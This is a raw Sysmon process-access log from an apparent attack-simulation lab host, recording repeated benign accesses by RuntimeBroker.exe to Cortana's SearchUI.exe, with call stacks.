13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000012699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405200C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405200C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15fb7|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000012694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
